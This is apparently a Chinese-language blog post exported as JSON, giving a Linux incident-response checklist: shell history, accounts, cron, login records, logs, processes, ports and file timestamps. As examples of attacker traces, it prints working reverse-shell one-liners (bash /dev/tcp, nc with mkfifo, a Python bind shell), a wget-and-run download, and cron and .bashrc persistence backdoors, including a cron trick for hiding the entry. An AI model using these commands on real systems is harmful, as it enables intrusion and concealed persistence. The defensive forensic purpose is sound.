{"id":1728,"date":"2025-02-01T15:23:08","date_gmt":"2025-02-01T07:23:08","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1728"},"modified":"2025-06-01T16:48:27","modified_gmt":"2025-06-01T08:48:27","slug":"linux-incident-response","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1728","title":{"rendered":"Linux Incident Response"},"content":{"rendered":"\n<p>Linux \u4e8b\u4ef6\u8abf\u67e5 (Linux Incident Investigation \/ Incident Response) \u662f\u6307\u5728\u88ab\u5165\u4fb5\u7684Linux\u7cfb\u7d71\u4e0a\u627e\u5230\u88ab\u99ed\u5ba2\u653b\u64ca\u7684\u6d3b\u52d5\uff0c\u5e38\u898b\u7684\u5206\u6790\u65b9\u5411\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6aa2\u67e5\u6b77\u53f2\u547d\u4ee4<\/li>\n\n\n\n<li>\u6aa2\u67e5\u5e33\u865f<\/li>\n\n\n\n<li>\u6aa2\u67e5\u6392\u7a0b<\/li>\n\n\n\n<li>\u6aa2\u67e5\u654f\u611f\u76ee\u9304 <\/li>\n\n\n\n<li>\u6aa2\u67e5\u767b\u5165\u8a18\u9304<\/li>\n\n\n\n<li>\u6aa2\u67e5\u958b\u6a5f\u555f\u52d5\u6a94<\/li>\n\n\n\n<li>\u6aa2\u67e5\u65e5\u5fd7<\/li>\n\n\n\n<li>\u6aa2\u67e5\u884c\u7a0b<\/li>\n\n\n\n<li>\u68c0\u67e5Port <\/li>\n\n\n\n<li>\u6aa2\u67e5\u6a94\u6848\u6642\u9593 <\/li>\n\n\n\n<li>\u5176\u4ed6\u8f14\u52a9\u5de5\u5177\u6aa2\u67e5<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u6b77\u53f2\u547d\u4ee4<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4e0b\u8f09\u60e1\u610f\u8173\u672c<\/h3>\n\n\n\n<p>\u5982\u4e0b\uff0c\u53ef\u4ee5\u770b\u5230root\u7528\u6236\u57f7\u884cwget\u7b49\u6307\u4ee4\uff0c\u521d\u6b65\u5224\u5b9a\u653b\u64ca\u8005\u767b\u5165\u8a72root\u5e33\u865f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>208 pwd\n209 wget --help\n210 wget https:\/\/www.12345678.com\/soft\/serv.sh -o serv.sh\n211 ls\n212 ls\n213 bash serv.sh\n213 crontab -e \n214 echo * 1 * * * wget https:\/\/www.12345678.com\/soft\/serv.sh -o serv.sh >> \/etc\/crontab\n215 crontab -l  <\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u53cd\u5411\u9023\u63a5<\/h3>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u9ed1\u5ba2\u4f7f\u7528bash\u505a\u53cd\u5411\u9023\u63a5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.10.10\/1234 0&gt;&amp;1'<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.10.10.10 1234 &gt;\/tmp\/f<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2&gt;&amp;1|nc -lvp 1234 &gt;\/tmp\/f<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0b\u662f\u7528PYTHON\u505a\u53cd\u5411\u9023\u63a5<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",1234));s1.listen(1);c,a=s1.accept();\\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'<\/code><\/pre>\n\n\n\n<p>\u5c07shell\u5347\u7d1a\u6210\u597d\u7528\u7684\u6a21\u5f0f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python -c 'import pty; pty.spawn(\"\/bin\/bash\")'<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u5e33\u865f<\/h2>\n\n\n\n<p>1. \u67e5\u8a62\u7279\u6b0a\u7528\u6236\uff08uid \u70ba0\uff09\uff0c\u67e5\u770b\u662f\u5426\u65b0\u589e\u7570\u5e38\u5e33\u865f\u3002<br><code>awk -F: '$3==0{print $1}' \/etc\/passwd<\/code><\/p>\n\n\n\n<p>2. \u67e5\u8a62\u53ef\u4ee5\u9060\u7aef\u767b\u5165\u7684\u5e33\u865f\u8a0a\u606f\uff0c\u99ed\u5ba2\u7528\u4f86\u9060\u7aef\u767b\u5165\u7684\u5e33\u865f\u3002<br><code>awk '\/\\$1|\\$6\/{print $1}' \/etc\/shadow<\/code><\/p>\n\n\n\n<p>3. \u9664root\u5e33\u865f\u5916\uff0c\u6aa2\u67e5\u5176\u4ed6\u5e33\u865f\u662f\u5426\u5b58\u5728sudo\u6b0a\u9650\u3002<br><code>more \/etc\/sudoers | grep -v \"^#\\|^$\" | grep \"ALL=(ALL) \"<\/code> <\/p>\n\n\n\n<p>\u5982\u975e\u7ba1\u7406\u9700\u8981\uff0c\u666e\u901a\u5e33\u865f\u61c9\u522a\u9664sudo\u6b0a\u9650<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u6392\u7a0b<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Crontab -L  <\/h3>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u6aa2\u67e5\u76f8\u95dc\u6307\u4ee4\u767c\u73fe\u8a72\u76ee\u6a19\u88ab\u5165\u4fb5\uff0c\u53ef\u4ee5\u770b\u5230\u6bcf\u59291\u9ede\u6703\u88ab\u5b89\u88dd\u8173\u672c\uff0c\u4e26\u57f7\u884c serv.sh<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># crontab -l\n* * * * * pi serv || nohup \/tmp\/axe\/serv > \/dev\/null 2>&amp;1 &amp;\n* 1 * * * wget https:\/\/www.12345678.com\/soft\/serv.sh -o serv.sh >> \/etc\/crontab\n* 1 * * * sudo bash serv.sh 9999<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>\u653b\u64ca\u8005\u6709\u6642\u6703\u5728\u6392\u7a0b\u52a0\u5f8c\u9580\u6307\u4ee4\uff0c\u5982\u4e0b<\/p>\n\n\n\n<p><code>echo \"* * * * * bash -i &gt;&amp; \/dev\/tcp\/192.168.1.10\/5555 0&gt;&amp;1\" |crontab -<\/code><\/p>\n\n\n\n<p>\u6bd4\u8f03\u9032\u968e\u7684\u9084\u6703\u505a\u4e00\u4e9b\u8b8a\u5316\uff0c\u589e\u52a0\u5f8c\u9580\u7684\u96b1\u5bc6\u6027\uff0c\u5982\u4e0b<\/p>\n\n\n\n<p><code>(crontab -l;printf \"*\/1 * * * * bash -i &gt;&amp; \/dev\/tcp\/192.168.44.128\/5555 0&gt;&amp;1;\\rno crontab for `whoami`%100c\\n\")|crontab -<\/code><\/p>\n\n\n\n<p>\u9019\u5728\u4e00\u4e9b\u820a\u7248linux\u4e0b\uff0croot\u57f7\u884ccrontab -l \u80fd\u6a21\u64ec\u6c92\u6709\u4efb\u4f55\u6392\u7a0b\u7684\u8a0a\u606f\uff0c\u986f\u793ano crontab for root <\/p>\n\n\n\n<p>\u4e0d\u904e\u5728\u5f88\u591a\u65b0\u7684Linux\u4e0b\uff0ccrontab -l \u6703\u81ea\u52d5\u904e\u6ffe\u6216\u6b63\u898f\u5316\u63db\u884c\u8207\u4e0d\u53ef\u898b\u5b57\u5143\uff0c\u6216\u8005\u5b83\u672c\u8eab\u662f\u628a\u6574\u884c\u7576\u6587\u5b57\u8b80\u53d6\uff0c\u7136\u5f8c\u6a19\u6e96\u8f38\u51fa\uff0ccrontab -l \u76f4\u63a5\u628a\u6574\u884c\u79c0\u51fa\u4f86\uff0c\u4e0d\u50cf echo \u6216 printf \u90a3\u6a23\u89e3\u6790 \\r\u3002\u800c\u4e14\u65b0\u7684crontab -l \u8f38\u51fa\u4e5f\u4e0d\u4e00\u5b9a\u8d70\u900f\u904e TTY\uff0c\u53ef\u4ee5\u662f\u76f4\u5beb\u5230 stdout\uff08\u975e\u4ea4\u4e92\u5f0f\u6a21\u5f0f\uff09\uff0c\u6240\u4ee5\u90a3\u500b \\r\uff08Carriage Return\uff09\u5c31\u6c92\u8fa6\u6cd5\u5f71\u97ff\u884c\u9996\u7684\u8f38\u51fa\u7d50\u679c\u4e86\u3002\u5c31\u6703\u628a\u9019\u5b8c\u6574\u7684\u60e1\u610f\u6392\u7a0b\u5c55\u793a\u51fa\u4f86 <\/p>\n\n\n\n<p>\u5982\u679c\u4e0d\u78ba\u5b9a\u8f38\u51fa\u7d50\u679c\u662f\u5426\u6709\u554f\u984c\uff0c\u53ef\u7528\u6b64\u8a9e\u6cd5<code>cat -A \/var\/spool\/cron\/root <\/code>\u6aa2\u67e5root\u7684\u6392\u7a0b\uff0c\u9019\u662f root \u4f7f\u7528\u8005\u7684 crontab \u6587\u4ef6\u6240\u5728\u4f4d\u7f6e\uff0c\u5b58\u5132\u8457 root \u4f7f\u7528\u8005\u6240\u6709\u6392\u7a0b\u4efb\u52d9<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u6392\u7a0b\u76f8\u95dc\u6a94\u6848<\/h3>\n\n\n\n<p>\u9700\u8981\u6aa2\u67e5\u7684\u6392\u7a0b\u76f8\u95dc\u6a94\u6848\u5982\u4e0b <\/p>\n\n\n\n<p><code>\/var\/spool\/cron\/*<\/code>  \u5b58\u653e\u6bcf\u500b\u7528\u6236\u7684crontab\u4efb\u52d9\uff0c*\u662f\u7528\u6236\u540d\u7a31  <br><code>\/etc\/crontab<\/code><br><code>\/etc\/cron.d\/*<\/code><br><code>\/etc\/cron.daily\/*<\/code><br><code>\/etc\/cron.hourly\/*<\/code><br><code>\/etc\/cron.monthly\/*<\/code><br><code>\/etc\/cron.weekly\/<\/code><br><code>\/etc\/anacrontab<\/code><br><code>\/var\/spool\/anacron\/*<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u654f\u611f\u76ee\u9304 <\/h2>\n\n\n\n<p>\u6309\u6642\u9593\u627e\u654f\u611f\u76ee\u9304\u662f\u5426\u6709\u65b0\u589e\u6307\u4ee4<\/p>\n\n\n\n<p><code>ls -alt \/tmp | head -n 10<\/code><\/p>\n\n\n\n<p><code>ls -alt \/usr\/bin | head -n 10<\/code><\/p>\n\n\n\n<p><code>ls -alt \/usr\/sbin | head -n 10<\/code><\/p>\n\n\n\n<p>\u6aa2\u67e5\u654f\u611f\u76ee\u9304\u662f\u5426\u6709\u9690\u85cf\u6587\u4ef6\uff1a<\/p>\n\n\n\n<p><code>ls -arlh \/tmp&nbsp;<\/code><\/p>\n\n\n\n<p>\u6ce8\u610f\u9690\u85cf\u6587\u4ef6\u5939\uff0c\u4ee5<code>..<\/code>\u4e3a\u540d\u7684\u6587\u4ef6\u5939\u5177\u6709\u9690\u85cf\u5c5e\u6027<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u767b\u5165\u8a18\u9304<\/h2>\n\n\n\n<p>\u5728\u6aa2\u67e5\u7684\u6642\u5019\uff0c\u5982\u679c\u99ed\u5ba2\u6c92\u6709\u4e0a\u7dda\uff0c\u53ef\u4ee5\u4f7f\u7528last\u6307\u4ee4\u6aa2\u67e5\u99ed\u5ba2\u4ec0\u9ebc\u6642\u9593\u767b\u5165\u3002\u4e0d\u904e\u5982\u679c\u99ed\u5ba2\u767b\u5165\u6642\u5c07\/var\/log\/wtmp\u6a94\u6848\u522a\u9664\u6216\u6e05\u7a7a\uff0c\u9019\u6a23\u6211\u5011\u5c31\u7121\u6cd5\u4f7f\u7528last\u6307\u4ee4\u7372\u5f97\u6709\u7528\u7684\u8cc7\u8a0a\u4e86\u3002<\/p>\n\n\n\n<p>\u5e38\u7528\u6307\u4ee4\u5982\u4e0b<\/p>\n\n\n\n<p><code>last<\/code> \u67e5\u770b\u6700\u8fd1\u767b\u5165\u6210\u529f\u7684\u4f7f\u7528\u8005\u53ca\u8a0a\u606f<\/p>\n\n\n\n<p><code>lastb -i<\/code> \u67e5\u770b\u6700\u8fd1\u767b\u5165\u5931\u6557\u7684\u4f7f\u7528\u8005\u53ca\u8cc7\u8a0a\uff1a<\/p>\n\n\n\n<p><code>lastlog<\/code>\u986f\u793a\u6240\u6709\u4f7f\u7528\u8005\u6700\u8fd1\u4e00\u6b21\u767b\u5165\u8cc7\u8a0a<\/p>\n\n\n\n<p>\u986f\u793alogged in\u8868\u793a\u4f7f\u7528\u8005\u4ecd\u5728\u767b\u5165<br>pts\u8868\u793a\u5f9eSSH\u9060\u7aef\u767b\u5165<br>tty\u8868\u793a\u5f9e\u63a7\u5236\u53f0\u767b\u9304\uff0c\u5c31\u662f\u5728\u4f3a\u670d\u5668\u65c1\u767b\u9304<br>ssh\u8868\u793a\u5f9eSSH\u9060\u7aef\u767b\u5165<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u958b\u6a5f\u555f\u52d5\u6a94<\/h2>\n\n\n\n<p>\u653b\u64ca\u8005\u6709\u6642\u6703\u5728\u958b\u6a5f\u6a94\u6848\u4e2d\u52a0\u5165\u5f8c\u9580\u6307\u4ee4\uff0c\u5982\u4e0b <br><code>echo \"bash -i >&amp; \/dev\/tcp\/192.168.1.10\/5555 0>&amp;1\" >> ~\/.bashrc<\/code><\/p>\n\n\n\n<p>\u5e38\u898b\u7684\u6aa2\u67e5\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat \/etc\/rc.local\nls -l \/etc\/init.d \nls -l \/etc\/rc.d\/rc0.d\/\nls -l \/etc\/rc.d\/rc1.d\/\nls -l \/etc\/rc.d\/rc2.d\/\nls -l \/etc\/rc.d\/rc3.d\/\nls -l \/etc\/rc.d\/rc4.d\/\nls -l \/etc\/rc.d\/rc5.d\/\nls -l \/etc\/rc.d\/rc6.d\/<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u65e5\u5fd7<\/h2>\n\n\n\n<p><code>\/var\/log\/secure<\/code>\u65e5\u5fd7\u8a18\u9304\u4e86\u9a57\u8b49\u548c\u6388\u6b0a\u65b9\u9762\u7684\u4fe1\u606f\uff0c\u53ea\u8981\u6d89\u53ca\u5e33\u865f\u548c\u5bc6\u78bc\u7684\u7a0b\u5f0f\u90fd\u6703\u8a18\u9304\uff0c\u4f8b\u5982SSH\u767b\u9304\uff0csu\u5207\u63db\u7528\u6236\uff0csudo\u6388\u6b0a\uff0c\u751a\u81f3\u6dfb\u52a0\u7528\u6236\u548c\u4fee\u6539\u7528\u6236\u5bc6\u78bc\u90fd\u6703\u8a18\u9304\u5728\u9019\u500b\u65e5\u8a8c\u6a94\u6848\u4e2d\uff0c\u5e38\u898b\u7684\u65e5\u5fd7\u5206\u6790\u65b9\u5411\u5982\u4e0b <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u5bc6\u78bc\u7206\u7834<\/h3>\n\n\n\n<p>\u67e5\u770b\u6709\u591a\u5c11IP\u5728\u7206\u7834\u4e3b\u6a5f\u7684root\u5e33\u865f <\/p>\n\n\n\n<p><code>grep \"Failed password for root\" \/var\/log\/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more<\/code><\/p>\n\n\n\n<p>\u67e5\u770b\u6709\u54ea\u4e9bIP\u5728\u7206\u7834  <\/p>\n\n\n\n<p><code>grep \"Failed password\" \/var\/log\/secure|grep -E -o \"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\"|uniq -c<\/code><\/p>\n\n\n\n<p>\u6aa2\u67e5\u7206\u7834\u7528\u6236\u540d\u5b57\u5178<\/p>\n\n\n\n<p><code>grep \"Failed password\" \/var\/log\/secure|perl -e 'while($_=&lt;&gt;){ \/for(.*?) from\/; print \"$1\\n\";}'|uniq -c|sort -nr<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u6210\u529f\u767b\u5165<\/h3>\n\n\n\n<p>\u6aa2\u67e5\u767b\u5165\u6210\u529f\u7684IP\u6709\u54ea\u4e9b <\/p>\n\n\n\n<p><code>grep \"Accepted \" \/var\/log\/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more<\/code><\/p>\n\n\n\n<p>\u6aa2\u67e5\u767b\u5165\u6210\u529f\u7684\u6642\u9593\u7528\u6236IP <\/p>\n\n\n\n<p><code>grep \"Accepted \" \/var\/log\/secure | awk '{print $1,$2,$3,$9,$11}'<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u7570\u5e38\u65b0\u589e\u8207\u522a\u9664\u5e33\u6236<\/h3>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u6aa2\u67e5\u6642\u767c\u73fe\u589e\u52a0\u4e86\u4e00\u500bkali\u7528\u6236\uff0c\u4f46\u53c8\u88ab\u522a\u9664\uff0c\u9700\u6aa2\u67e5\u662f\u5426\u70ba\u7ba1\u7406\u8005\u64cd\u4f5c\uff0c\u5982\u679c\u4e0d\u662f\u5c31\u662f\u99ed\u5ba2\u884c\u70ba <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#grep \"useradd\" \/var\/log\/secureJul \n10 00:12:15 localhost useradd&#91;2382]: new group: name=kali, GID=1001\nJul 10 00:12:15 localhost useradd&#91;2382]: new user: name=kali, UID=1001, GID=1001, home=\/home\/kali\n, shell=\/bin\/bash\nJul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code># grep \"userdel\" \/var\/log\/secure\nJul 10 00:14:17 localhost userdel&#91;2393]: delete user 'kali'\nJul 10 00:14:17 localhost userdel&#91;2393]: removed group 'kali' owned by 'kali'\nJul 10 00:14:17 localhost userdel&#91;2393]: removed shadow group 'kali' owned by 'kali'<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6aa2\u67e5\u6b0a\u9650\u8b8a\u63db<\/h3>\n\n\n\n<p>\u6aa2\u67e5\u4f7f\u7528su\u5207\u63db\u7528\u6236\u7684\u8a18\u9304 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)<\/code><\/pre>\n\n\n\n<p>\u6aa2\u67e5\u4f7f\u7528sudo\u57f7\u884c\u7684\u8a18\u9304  <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Jul 10 00:43:09 localhost sudo:&nbsp; &nbsp; good : TTY=pts\/4 ; PWD=\/home\/good ; USER=root ; COMMAND=\/sbin\/shutdown -r now<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u884c\u7a0b<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ps aux<\/h3>\n\n\n\n<p>\u6aa2\u67e5process\u958b\u59cb\u7684\u6642\u9593\u548c\u540d\u7a31\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#ps aux\nUSER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND\nroot      6666  0.0  0.0 168688  9688 ?        Ss   May28   0:02 \/home\/ubuntu\/serv<\/code><\/pre>\n\n\n\n<p>\u8868\u793a\/home\/ubuntu\/serv\u662f\u57285\/28\u555f\u52d5\uff0cTime\u76840:02\u4e0d\u662f\u904b\u884c\u591a\u9577\u6642\u9593\u800c\u662fCPU\u5171\u82b1\u8cbb\u591a\u5c11\u6642\u9593\u4f86\u57f7\u884c\u6307\u4ee4 \u3002\u5982\u679c\u7ba1\u7406\u54e1\u4e0d\u77e5\u9053\u8a72process\uff0c\u53ef\u80fd\u662f\u99ed\u5ba2\u884c\u70ba<\/p>\n\n\n\n<p>\u4e5f\u53ef\u4ee5\u900f\u904e\u9019\u500b\u65b9\u5f0f\u67e5\u770bprocess\u555f\u52d5\u6642\u9593\u9ede<code>ps -p 6666 -o lstart<\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7570\u5e38PID\u53ef\u6aa2\u67e5\u539f\u59cb\u53ef\u57f7\u884c\u6587\u4ef6<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#ls -l \/proc\/6666\/exe\nlrwxrwxrwx. 1 root root 0 May 31 16:00 \/proc\/6666\/exe -> \/path\/to\/executable<\/code><\/pre>\n\n\n\n<p>\u7570\u5e38PID\u53ef\u6aa2\u67e5PID\u6587\u4ef6\u985e\u578b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#file \/proc\/6666\/exe\n\/proc\/6666\/exe: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, for GNU\/Linux 3.2.0, BuildID&#91;sha1]=\u2026 <\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">pstree<\/h3>\n\n\n\n<p>\u6aa2\u67e5\u662f\u5426\u6709\u7570\u5e38\u7684\u540d\u7a31\u8207PID\uff0c\u8209\u4f8b\u5982\u4e0b\uff0c\u767c\u73fesshd &#8211; bash &#8211; malicious_script.sh \u60e1\u610f\u8173\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#pstree -p\nsystemd(1)\u2500\u252c\u2500apache2(789)\u2500\u252c\u2500apache2(790)\n           \u2502              \u2514\u2500apache2(791)\n           \u251c\u2500cron(123)\n           \u251c\u2500dbus-daemon(456)\n           \u251c\u2500sshd(800)\u2500\u252c\u2500sshd(801)\u2500\u252c\u2500bash(802)\u2500\u2500\u2500my_malware(803)\n           \u2502           \u2502           \u2514\u2500sshd(804)\u2500\u252c\u2500bash(805)\u2500\u2500\u2500top(806)\n           \u2502           \u2502                       \u2514\u2500bash(807)\u2500\u2500\u2500malicious_script.sh(808)\n           \u2502           \u2514\u2500sshd(809)\u2500\u252c\u2500bash(810)\u2500\u2500\u2500(sleep)(811)\n           \u2502                       \u2514\u2500bash(812)\n           \u251c\u2500php-fpm(900)\u2500\u252c\u2500php-fpm(901)\n           \u2502              \u2514\u2500php-fpm(902)\n           \u2514\u25002*&#91;getty(567)]<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">lsof<\/h3>\n\n\n\n<p>\u7528lsof\u986f\u793aPID\u6240\u6253\u958b\u7684\u6240\u6709\u6587\u4ef6\u548c\u7db2\u7d61\u9023\u63a5\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># lsof -p 1234\nCOMMAND     PID   USER   FD      TYPE DEVICE SIZE\/OFF      NODE NAME\nmy_malware 1234   root  cwd       DIR    8,1     4096    131073 \/\nmy_malware 1234   root  txt       REG    8,1   512000    789012 \/tmp\/evil_payload\nmy_malware 1234   root    3u     IPv4  23456      0t0       TCP 192.168.1.100:4444->10.0.0.5:80 (ESTABLISHED)\nmy_malware 1234   root    4u     REG    8,1   123456    987654 \/var\/log\/my_server.log<\/code><\/pre>\n\n\n\n<p>\u7528lsof\u986f\u793a\u7570\u5e38process\u6240\u6253\u958b\u7684\u6240\u6709\u6587\u4ef6\u548c\u7db2\u7d61\u9023\u63a5\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># lsof -c serv\nCOMMAND     PID   USER   FD   TYPE DEVICE SIZE\/OFF      NODE NAME\nserv       1234   root  cwd       DIR    8,1     4096    131073 \/\nserv       1234   root  txt       REG    8,1   512000    789012 \/tmp\/backdoor (deleted)\nserv       1234   root  mem       REG    8,1   116544    131652 \/usr\/lib\/x86_64-linux-gnu\/libc.so.6\nserv       1234   root    0u      CHR    1,3      0t0       9 \/dev\/null\nserv       1234   root    1u      CHR    1,3      0t0       9 \/dev\/null\nserv       1234   root    2u      CHR    1,3      0t0       9 \/dev\/null\nserv       1234   root    3u     IPv4  23456      0t0       TCP *:12345 (LISTEN)\nserv       1234   root    4u     IPv4  67890      0t0       TCP 192.168.1.100:54321->203.0.113.10:80 (ESTABLISHED)\nserv       1234   root    5w     REG    8,1     12345    987654 \/var\/log\/serv.log<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u68c0\u67e5Port <\/h2>\n\n\n\n<p><code>netstat -antlp | more<\/code> \u5982\u679c\u767c\u73fe\u6709\u53ef\u7591port\uff0c\u6aa2\u67e5\u76f8\u5c0d\u7684pid <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u7528lsof\u986f\u793a\u7570\u5e38port\u6240\u6253\u958b\u7684\u6240\u6709\u6587\u4ef6\u548c\u7db2\u7d61\u9023\u63a5\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># lsof -i :22\nCOMMAND     PID   USER   FD   TYPE DEVICE SIZE\/OFF NODE NAME\nsshd       1001   root    3u  IPv4  12345      0t0  TCP *:ssh (LISTEN)\nsshd       1001   root    4u  IPv6  12346      0t0  TCP *:ssh (LISTEN)\nsshd       1005   root    3u  IPv4  12347      0t0  TCP 192.168.1.100:ssh->192.168.1.1:54321 (ESTABLISHED)\nsshd       1005   root    4u  IPv6  12348      0t0  TCP &#91;::1]:ssh->&#91;::1]:54322 (ESTABLISHED)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u6aa2\u67e5\u6a94\u6848\u6642\u9593 <\/h2>\n\n\n\n<p>\u6839\u64da\u7570\u5e38\u7684\u6642\u9593\uff0c\u5c0b\u627e\u6700\u8fd1\u5e7e\u5929\u88ab\u52d5\u904e\u7684\u6a94\u6848 <\/p>\n\n\n\n<p>find\u5e38\u7528\u53c3\u6578<br>-atime \u6a94\u6848\u8a2a\u554f\u6642\u9593  <br>-mtime \u6a94\u6848\u5167\u5bb9\u4fee\u6539\u6642\u9593  <br>-ctime \u6a94\u6848\u72c0\u614b\u4fee\u6539\u6642\u9593\uff08\u6587\u4ef6\u6b0a\u9650\uff0c\u6240\u6709\u8005\/\u7fa4\uff0c\u6587\u4ef6\u5927\u5c0f\u7b49\uff0c\u7576\u6587\u4ef6\u5167\u5bb9\u767c\u751f\u6539\u8b8actime\u4e5f\u6703\u8b8a\uff09<br>ps:<br>\u8981\u6ce8\u610f\uff1a\u7cfb\u7d71\u9032\u7a0b\/\u8173\u672c\u5b58\u53d6\u6587\u4ef6\uff0catime\/mtime\/ctime\u4e5f\u6703\u8ddf\u8457\u4fee\u6539\uff0c\u4e0d\u4e00\u5b9a\u662f\u4eba\u70ba\u7684\u4fee\u6539\u624d\u6703\u88ab\u8a18\u9304<br>ps:<br>\u6ce8\u610f\u8981\u53bb\u6389\/sys\/fs\u3001 \/run\/udev\u3001\/sys\/kernel \u4e4b\u985e\u958b\u982d\u7684\u6a94\u6848 <\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u67e5\u627e\u524d2\u5929\uff0c\u90a3\u4e00\u5929\u88ab\u4fee\u6539\u7684\u6a94\u6848\uff0c<code>find \/ -mtime 2 -ls | more<\/code><\/p>\n\n\n\n<p>\u5c0b\u627e\u4e00\u5929\u5167\u88ab\u4fee\u6539\u7684\u6a94\u6848 \uff1a<code>find \/ -mtime -1 -ls\u00a0 | more<\/code><\/p>\n\n\n\n<p>\u5c0b\u627e50\u5929\u524d\u88ab\u4fee\u6539\u7684\u6a94\u6848 \uff1a<code>find .\/ -mtime +50 -ls<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator 